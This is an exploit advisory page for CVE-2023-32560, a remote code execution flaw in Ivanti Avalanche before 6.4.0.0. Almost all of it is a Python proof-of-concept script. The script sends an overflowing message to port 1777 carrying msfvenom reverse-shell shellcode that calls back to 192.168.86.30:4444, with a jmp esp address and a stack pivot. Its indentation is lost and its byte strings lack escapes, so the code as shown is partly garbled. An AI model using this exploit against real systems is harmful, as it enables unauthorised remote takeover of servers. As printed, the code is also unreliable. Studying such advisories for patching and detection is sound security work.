Authored by Robel Campbell

Ivanti Avalanche versions prior to 6.4.0.0 suffer from a remote code execution vulnerability.

advisories | CVE-2023-32560

"""
Exploit Title: Ivanti Avalanche <v6.4.0.0 - Remote Code Execution
Date: 2023-08-16
Exploit Author: Robel Campbell (@RobelCampbell)
Vendor Homepage: https://www.ivanti.com/
Software Link: https://www.wavelink.com/download/Downloads.aspx?DownloadFile=27550&returnUrl=/Download-Avalanche_Mobile-Device-Management-Software/
Version: v6.4.0.0
Tested on: Windows 11 21H2
CVE: CVE-2023-32560
Reference: https://www.tenable.com/security/research/tra-2023-27
"""

import socket
import struct
import sys

# Create an item structure for the header and payload
class Item:
def __init__(self, type_, name, value):
self.type = type_
self.name = name.encode()
self.value = value
self.name_size = 0x5
self.value_size = 0x800

def pack(self):
return struct.pack('>III{}s{}s'.format(self.name_size, self.value_size),
self.type, self.name_size, self.value_size, self.name, self.value)

# Create a header structure
class HP:
def __init__(self, hdr, payload):
self.hdr = hdr
self.payload = payload
self.pad = b'x00' * (16 - (len(self.hdr) + len(self.payload)) % 16)

def pack(self):
return b''.join([item.pack() for item in self.hdr]) +
b''.join([item.pack() for item in self.payload]) + self.pad

# Create a preamble structure
class Preamble:
def __init__(self, hp):
self.msg_size = len(hp.pack()) + 16
self.hdr_size = sum([len(item.pack()) for item in hp.hdr])
self.payload_size = sum([len(item.pack()) for item in hp.payload])
self.unk = 0 # Unknown value

def pack(self):
return struct.pack('>IIII', self.msg_size, self.hdr_size, self.payload_size, self.unk)

# Create a message structure
class Msg:
def __init__(self, hp):
self.pre = Preamble(hp)
self.hdrpay = hp

def pack(self):
return self.pre.pack() + self.hdrpay.pack()

# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.86.30 LPORT=4444 exitfunc=thread -f python
shellcode = b""
shellcode += b"fce8820000006089e531c064"
shellcode += b"8b50308b520c8b52148b7228"
shellcode += b"0fb74a2631ffac3c617c022c"
shellcode += b"20c1cf0d01c7e2f252578b52"
shellcode += b"108b4a3c8b4c1178e34801d1"
shellcode += b"518b592001d38b4918e33a49"
shellcode += b"8b348b01d631ffacc1cf0d01"
shellcode += b"c738e075f6037df83b7d2475"
shellcode += b"e4588b582401d3668b0c4b8b"
shellcode += b"581c01d38b048b01d0894424"
shellcode += b"245b5b61595a51ffe05f5f5a"
shellcode += b"8b12eb8d5d68333200006877"
shellcode += b"73325f54684c772607ffd5b8"
shellcode += b"9001000029c454506829806b"
shellcode += b"00ffd5505050504050405068"
shellcode += b"ea0fdfe0ffd5976a0568c0a8"
shellcode += b"561e680200115c89e66a1056"
shellcode += b"576899a57461ffd585c0740c"
shellcode += b"ff4e0875ec68f0b5a256ffd5"
shellcode += b"68636d640089e357575731f6"
shellcode += b"6a125956e2fd66c744243c01"
shellcode += b"018d442410c6004454505656"
shellcode += b"5646564e565653566879cc3f"
shellcode += b"86ffd589e04e5646ff306808"
shellcode += b"871d60ffd5bbe01d2a0a68a6"
shellcode += b"95bd9dffd53c067c0a80fbe0"
shellcode += b"7505bb4713726f6a0053ffd5"

buf = b'90' * 340
buf += b'812b4100' # jmp esp (0x00412b81)
buf += b'90909090'
buf += b'90909090'
buf += shellcode
buf += b'41' * 80
buf += b'84d45200' # stack pivot: add esp, 0x00000FA0 ; retn 0x0004 ; (0x0052d484)
buf += b'43' * (0x800 - len(buf))

buf2 = b'41' * 0x1000

# Create message payload
hdr = [Item(3, "pwned", buf)]
payload = [Item(3, "pwned", buf2)] # dummy payload, probabaly not necessary
hp_instance = HP(hdr, payload)
msg_instance = Msg(hp_instance)

# Default port
port = 1777

# check for target host argument
if len(sys.argv) > 1:
host = sys.argv[1]
else:
print("Usage: python3 CVE-2023-32560.py <host ip>")
sys.exit()

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.connect((host, port))
s.sendall(msg_instance.pack())
print("Message sent!")
s.close()